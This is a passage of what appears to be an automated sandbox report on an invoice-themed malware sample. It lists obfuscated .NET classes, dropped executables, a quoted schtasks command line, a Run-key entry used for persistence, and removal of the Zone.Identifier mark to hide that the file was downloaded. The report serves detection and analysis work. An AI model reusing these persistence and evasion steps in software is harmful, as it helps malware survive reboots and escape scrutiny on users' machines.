Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, jGxU6uLS0cTcaSem1E.cs	.Net Code: ipEhuIO7wR System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_0155E920 pushad ; retf	0_2_0155E929
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A2D84 pushad ; retf	0_2_078A2D85
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A2DC5 pushad ; retf	0_2_078A2DC6
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_00ED0C3D push edi; ret	10_2_00ED0CC2
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_04BE9EA0 push eax; mov dword ptr [esp], ecx	11_2_04BE9EA4
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_04BE9E8F push eax; mov dword ptr [esp], ecx	11_2_04BE9EA4
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C24901 push es; ret	11_2_06C2490C
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F0FA10 push es; retf	15_2_02F0FA22
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F0696A pushfd ; ret	15_2_02F0696B
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F00C3D push edi; ret	15_2_02F00CC2
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BC66A8 push es; retf	15_2_06BC66B6
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BCE750 push 4D4006CCh; retf	15_2_06BCE75E
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BC8F32 push es; ret	15_2_06BC8F4C
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_04A99EA0 push eax; mov dword ptr [esp], ecx	16_2_04A99EA4
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_04A99E8F push eax; mov dword ptr [esp], ecx	16_2_04A99EA4
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D4901 push es; ret	16_2_068D490C
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EB0B4F push edi; ret	20_2_00EB0CC2
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EB0C95 push edi; retf	20_2_00EB0C3A
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_0695E0C0 push 3C6806CCh; iretd	20_2_0695E0CE
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06958CF2 push es; ret	20_2_06958D0C
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_0695B6CF push es; ret	20_2_0695B6D0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06951658 push cs; retf	20_2_0695165B
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_02DAE920 pushad ; retf	24_2_02DAE929
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_055A9EA0 push eax; mov dword ptr [esp], ecx	24_2_055A9EA4
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074A28BC push E8074710h; retf	24_2_074A28C1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_02EFA2EA pushfd ; ret	27_2_02EFA2F1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_02EF0C3D push edi; ret	27_2_02EF0CC2
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D2EEB8 push ds; retf	27_2_06D2EF3A
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D2CF63 push es; retf	27_2_06D2CF66
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D25F36 push FFFFFF8Bh; iretd	27_2_06D25F38
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D23410 push cs; retf 9006h	27_2_06D23492

Source: Invoice.exe	Static PE information: section name: .text entropy: 7.965587512364022
Source: kaJNzBnxbXm.exe.0.dr	Static PE information: section name: .text entropy: 7.965587512364022

Source: 0.2.Invoice.exe.a600000.8.raw.unpack, UiJ0ge5mBiTTGJJUcf.cs	High entropy of concatenated method names: 'TpR6gsBqAZ', 'fCF6m1Nl1s', 'iYJ6xraGvh', 'UiU6UTdIlD', 'a5l6jhmD3L', 'I716p81Qo0', 'FhU6DweTfC', 'q0k6QPmbTc', 'la76SBKYFt', 'rgw67YKeb0'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, EIBrmQl3fCwRQx0Nkx.cs	High entropy of concatenated method names: 'ew6JI4DxIb', 'iU4J6eSTuZ', 'TGyJ0ilrw9', 'cJSJ2PeqtM', 'VUTJT6BjJY', 'Sb10jBo1od', 'Vyl0pVyVbW', 'n9F0DSfkoF', 'nE20QFSu7K', 'UQF0SO9aoY'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, q5gbWaDChjkFBUGIKJ.cs	High entropy of concatenated method names: 'BwZHbU9phb', 'FCZHPIRRNV', 'jlgHhuMx5p', 'qxhHObL6m8', 'S3tH6jT4QX', 'wOAH09338o', 'Cp5HJANYro', 'lX3ZDGFmvR', 'do9ZQFQ7iq', 'BVHZSe5Qq9'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, B2CBtvPEkNk3k5h3BTp.cs	High entropy of concatenated method names: 'aEc9ABqTwJ', 'cHk9XF3knD', 'VG59uTqBPR', 'as0AQ73vgwRNxDUHCsN', 'nIuD5Q3RDRp5mfxO7Qo', 'bEqRIl3Zp6pOpmShaIZ', 'VYdOxT3PQNNV7jMrlcQ', 'gck3f13EKnGeS4fi52s'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, taTHaguIgLY3bM3hhE.cs	High entropy of concatenated method names: 'D2A2ANN9Gl', 'R702XtKD5R', 'KwW2u4G8h3', 'FFF2YoD6eh', 'CvE2R6rpU7', 'EJi28SJKu5', 'X9t25VsQOn', 'RGf2rESRT4', 'Ucv2yU2Gfq', 'fVc2WAOZ2e'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, YWGrgKGrr9dgIDORMf.cs	High entropy of concatenated method names: 'gO0ZO0aXRN', 'YVTZ6qfaK3', 'utYZw6bNqh', 'xNUZ0RT8JQ', 's4qZJwNSwQ', 'W3sZ2rjsZG', 'NQQZTE8upc', 'SMdZ3HD63M', 'lmhZc8W6PL', 'eXUZqBLKap'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, Cju3rjOQSNtJwaqocK.cs	High entropy of concatenated method names: 'dMFfFRlq0W', 'CbffNWqmcf', 'pfLfgs2b9r', 'GNKfmwk1FR', 'he8fvjBRsI', 'hFWfaJEMbD', 'nSafBnBlFD', 'J0IflOxdwZ', 'HxWfV2HZ78', 'TqcfLsa8nD'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, tF3NE49dN1fHmfE2OM.cs	High entropy of concatenated method names: 'ToString', 'xAPC1VhrNA', 'L9sCvXB3S0', 'kZKCaGZ137', 'ldICBDbRKp', 'oJMClwPEuc', 'kBnCVJT4pw', 'b1jCLmawBF', 'CCpCeOd9XR', 'UQsCk8Imn6'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, QriRWWw2UTSFFcnJ3R.cs	High entropy of concatenated method names: 'Won0RgHcx8', 'QcP05Y3wW8', 'S87waWsZUn', 'xRZwBx25Xv', 'kqDwlZqvmB', 'gD7wVwZ7UE', 'yalwLCGmOr', 'fDAweqqm2b', 'MOywk14igG', 'zNRwFUmSYL'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, mjqmK2PWR2NhJ0H8KYh.cs	High entropy of concatenated method names: 'UnhHAWlopU', 'kSDHXNG0J5', 'oWGHuVe299', 'P3GHYKdifH', 'S4oHRYAZwy', 'llYH8k58w5', 'FvJH5TdGrF', 'mhXHrQ00SY', 'ImpHyKAsK2', 'cwrHWrOw4F'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, yLesXSPc0cbmVTvpmR9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rZw9gcQNRU', 'HF79m0fG7Y', 'HPe9xSic5F', 'HmC9UqDx9H', 'qZb9jD76pb', 'm4q9pI4aEC', 'iRf9Dk8UXH'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, fvPGMvAj9tCAVAEDOT.cs	High entropy of concatenated method names: 'f8RKrqp5YQ', 'HPAKyX4GtF', 'r7SKGRiZYJ', 'RPhKvCm5xg', 'pghKBD8feY', 'vY8KlkWNjy', 'zOtKLKBcbG', 'OkCKekGjdw', 'iixKFt949U', 'IfgK1A8IEH'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, sorUNDEvWx52xYJOA9.cs	High entropy of concatenated method names: 'bl5uU08Zj', 'nkDY8bmsM', 'G8e8mnumN', 'kRs5cADvG', 'S9LyI6COL', 'OaaWd8acJ', 'uH36WEEOdRGIgiQnJP', 'RBkMMd1g8efHXaygTf', 'dUnZabLw4', 'a8Q92SUTn'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, NgjgUsfwbse2ujuNr0.cs	High entropy of concatenated method names: 'zwdwYOS1xD', 'DOWw8Rb6hU', 'SdEwrgmSrA', 'W77wyJGEJm', 'EK8wfmUNOH', 'GKkwCQclIJ', 'nRVwEKv6VU', 'sSGwZulRKA', 'vqPwHeN8I0', 'zXaw978dRB'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, TVxD1PhGaou6QQJ9M8.cs	High entropy of concatenated method names: 'KcCJi0iHsn', 'CGyJAEpkhL', 'Ho9JuQRE7y', 'DQOJYhDbfU', 'Uh2J8bZpVw', 'CVxJ5CRATi', 'bnYJy4AD8q', 'aClJW9MTBa', 'Rv1kH72Vdq7qamMUi85', 'a1t1Qk2XK2tLTGoeV7e'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, jGxU6uLS0cTcaSem1E.cs	High entropy of concatenated method names: 'MFVPIXJAkZ', 'knRPOwjm1Q', 'VFjP6F7YN7', 'UprPwv28F8', 'Xj7P0nQ11g', 'BhOPJtdyiS', 'UO3P22x9hk', 'BStPTxLJpr', 'Gk4P3ICkaZ', 'fsNPcGEDYq'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, GEWaMHXNdnbgJXqZYJ.cs	High entropy of concatenated method names: 'Dispose', 'weubSZdZx2', 'PBonvX7mfn', 'S6ussyAwSb', 'cvdb78ughM', 'oN0bzNSOSI', 'ProcessDialogKey', 'lTDn4BT1bP', 'utQnbAQCci', 'Ruunn8N2W7'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, tCaO0JRP9pPUWx56tL.cs	High entropy of concatenated method names: 'TYpEQWM8XF', 'D6bE7dwO8T', 'vl6Z4fBiP3', 'BGCZb8ga9M', 'IN4E1ppZHV', 'oGZENrXdsP', 'fKhEtryh8b', 'OqSEg5lr54', 'TvZEmY4Gc0', 'EsdExeLC8p'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, D5GhXczK3CwNgSuY8O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYLHKwtE9Y', 'pteHfPQqVr', 'Sq5HCtt838', 'PZRHEjp3q0', 'VIZHZUPTNp', 'j4GHHEXPBM', 'YgLH9JN3q4'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, pnH9S8pKmwnqqY7kZo.cs	High entropy of concatenated method names: 'TB8b2yJeup', 'nx5bTOdFg2', 'niIbceH3E4', 'FRCbqVPkuF', 'oiBbfNVehh', 'gD0bClw2I8', 'LgGeBvJPuQH6dILDbR', 'q7B0IWuCFetuOA29Ad', 'mF0bbfWSgd', 'cwebP625kR'
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, S2BtbRysTRp7KGSVvm.cs	High entropy of concatenated method names: 'BhNZGXr3Rn', 'y1EZvm0FqM', 'VkRZav8ZqZ', 'bQIZBffQdX', 'PVyZgQ0GSf', 'NNcZlp3keU', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Invoice.exe.3e59970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.Invoice.exe.3e59970.3.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, UiJ0ge5mBiTTGJJUcf.cs	High entropy of concatenated method names: 'TpR6gsBqAZ', 'fCF6m1Nl1s', 'iYJ6xraGvh', 'UiU6UTdIlD', 'a5l6jhmD3L', 'I716p81Qo0', 'FhU6DweTfC', 'q0k6QPmbTc', 'la76SBKYFt', 'rgw67YKeb0'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, EIBrmQl3fCwRQx0Nkx.cs	High entropy of concatenated method names: 'ew6JI4DxIb', 'iU4J6eSTuZ', 'TGyJ0ilrw9', 'cJSJ2PeqtM', 'VUTJT6BjJY', 'Sb10jBo1od', 'Vyl0pVyVbW', 'n9F0DSfkoF', 'nE20QFSu7K', 'UQF0SO9aoY'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, q5gbWaDChjkFBUGIKJ.cs	High entropy of concatenated method names: 'BwZHbU9phb', 'FCZHPIRRNV', 'jlgHhuMx5p', 'qxhHObL6m8', 'S3tH6jT4QX', 'wOAH09338o', 'Cp5HJANYro', 'lX3ZDGFmvR', 'do9ZQFQ7iq', 'BVHZSe5Qq9'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, B2CBtvPEkNk3k5h3BTp.cs	High entropy of concatenated method names: 'aEc9ABqTwJ', 'cHk9XF3knD', 'VG59uTqBPR', 'as0AQ73vgwRNxDUHCsN', 'nIuD5Q3RDRp5mfxO7Qo', 'bEqRIl3Zp6pOpmShaIZ', 'VYdOxT3PQNNV7jMrlcQ', 'gck3f13EKnGeS4fi52s'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, taTHaguIgLY3bM3hhE.cs	High entropy of concatenated method names: 'D2A2ANN9Gl', 'R702XtKD5R', 'KwW2u4G8h3', 'FFF2YoD6eh', 'CvE2R6rpU7', 'EJi28SJKu5', 'X9t25VsQOn', 'RGf2rESRT4', 'Ucv2yU2Gfq', 'fVc2WAOZ2e'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, YWGrgKGrr9dgIDORMf.cs	High entropy of concatenated method names: 'gO0ZO0aXRN', 'YVTZ6qfaK3', 'utYZw6bNqh', 'xNUZ0RT8JQ', 's4qZJwNSwQ', 'W3sZ2rjsZG', 'NQQZTE8upc', 'SMdZ3HD63M', 'lmhZc8W6PL', 'eXUZqBLKap'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, Cju3rjOQSNtJwaqocK.cs	High entropy of concatenated method names: 'dMFfFRlq0W', 'CbffNWqmcf', 'pfLfgs2b9r', 'GNKfmwk1FR', 'he8fvjBRsI', 'hFWfaJEMbD', 'nSafBnBlFD', 'J0IflOxdwZ', 'HxWfV2HZ78', 'TqcfLsa8nD'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, tF3NE49dN1fHmfE2OM.cs	High entropy of concatenated method names: 'ToString', 'xAPC1VhrNA', 'L9sCvXB3S0', 'kZKCaGZ137', 'ldICBDbRKp', 'oJMClwPEuc', 'kBnCVJT4pw', 'b1jCLmawBF', 'CCpCeOd9XR', 'UQsCk8Imn6'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, QriRWWw2UTSFFcnJ3R.cs	High entropy of concatenated method names: 'Won0RgHcx8', 'QcP05Y3wW8', 'S87waWsZUn', 'xRZwBx25Xv', 'kqDwlZqvmB', 'gD7wVwZ7UE', 'yalwLCGmOr', 'fDAweqqm2b', 'MOywk14igG', 'zNRwFUmSYL'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, mjqmK2PWR2NhJ0H8KYh.cs	High entropy of concatenated method names: 'UnhHAWlopU', 'kSDHXNG0J5', 'oWGHuVe299', 'P3GHYKdifH', 'S4oHRYAZwy', 'llYH8k58w5', 'FvJH5TdGrF', 'mhXHrQ00SY', 'ImpHyKAsK2', 'cwrHWrOw4F'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, yLesXSPc0cbmVTvpmR9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rZw9gcQNRU', 'HF79m0fG7Y', 'HPe9xSic5F', 'HmC9UqDx9H', 'qZb9jD76pb', 'm4q9pI4aEC', 'iRf9Dk8UXH'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, fvPGMvAj9tCAVAEDOT.cs	High entropy of concatenated method names: 'f8RKrqp5YQ', 'HPAKyX4GtF', 'r7SKGRiZYJ', 'RPhKvCm5xg', 'pghKBD8feY', 'vY8KlkWNjy', 'zOtKLKBcbG', 'OkCKekGjdw', 'iixKFt949U', 'IfgK1A8IEH'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, sorUNDEvWx52xYJOA9.cs	High entropy of concatenated method names: 'bl5uU08Zj', 'nkDY8bmsM', 'G8e8mnumN', 'kRs5cADvG', 'S9LyI6COL', 'OaaWd8acJ', 'uH36WEEOdRGIgiQnJP', 'RBkMMd1g8efHXaygTf', 'dUnZabLw4', 'a8Q92SUTn'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, NgjgUsfwbse2ujuNr0.cs	High entropy of concatenated method names: 'zwdwYOS1xD', 'DOWw8Rb6hU', 'SdEwrgmSrA', 'W77wyJGEJm', 'EK8wfmUNOH', 'GKkwCQclIJ', 'nRVwEKv6VU', 'sSGwZulRKA', 'vqPwHeN8I0', 'zXaw978dRB'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, TVxD1PhGaou6QQJ9M8.cs	High entropy of concatenated method names: 'KcCJi0iHsn', 'CGyJAEpkhL', 'Ho9JuQRE7y', 'DQOJYhDbfU', 'Uh2J8bZpVw', 'CVxJ5CRATi', 'bnYJy4AD8q', 'aClJW9MTBa', 'Rv1kH72Vdq7qamMUi85', 'a1t1Qk2XK2tLTGoeV7e'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, jGxU6uLS0cTcaSem1E.cs	High entropy of concatenated method names: 'MFVPIXJAkZ', 'knRPOwjm1Q', 'VFjP6F7YN7', 'UprPwv28F8', 'Xj7P0nQ11g', 'BhOPJtdyiS', 'UO3P22x9hk', 'BStPTxLJpr', 'Gk4P3ICkaZ', 'fsNPcGEDYq'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, GEWaMHXNdnbgJXqZYJ.cs	High entropy of concatenated method names: 'Dispose', 'weubSZdZx2', 'PBonvX7mfn', 'S6ussyAwSb', 'cvdb78ughM', 'oN0bzNSOSI', 'ProcessDialogKey', 'lTDn4BT1bP', 'utQnbAQCci', 'Ruunn8N2W7'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, tCaO0JRP9pPUWx56tL.cs	High entropy of concatenated method names: 'TYpEQWM8XF', 'D6bE7dwO8T', 'vl6Z4fBiP3', 'BGCZb8ga9M', 'IN4E1ppZHV', 'oGZENrXdsP', 'fKhEtryh8b', 'OqSEg5lr54', 'TvZEmY4Gc0', 'EsdExeLC8p'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, D5GhXczK3CwNgSuY8O.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYLHKwtE9Y', 'pteHfPQqVr', 'Sq5HCtt838', 'PZRHEjp3q0', 'VIZHZUPTNp', 'j4GHHEXPBM', 'YgLH9JN3q4'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, pnH9S8pKmwnqqY7kZo.cs	High entropy of concatenated method names: 'TB8b2yJeup', 'nx5bTOdFg2', 'niIbceH3E4', 'FRCbqVPkuF', 'oiBbfNVehh', 'gD0bClw2I8', 'LgGeBvJPuQH6dILDbR', 'q7B0IWuCFetuOA29Ad', 'mF0bbfWSgd', 'cwebP625kR'
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, S2BtbRysTRp7KGSVvm.cs	High entropy of concatenated method names: 'BhNZGXr3Rn', 'y1EZvm0FqM', 'VkRZav8ZqZ', 'bQIZBffQdX', 'PVyZgQ0GSf', 'NNcZlp3keU', 'Next', 'Next', 'Next', 'NextBytes'

Source: C:\Users\user\Desktop\Invoice.exe	File created: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Invoice.exe	File created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Invoice.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp"

Source: C:\Users\user\Desktop\Invoice.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJte			Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJte			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\Invoice.exe	File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
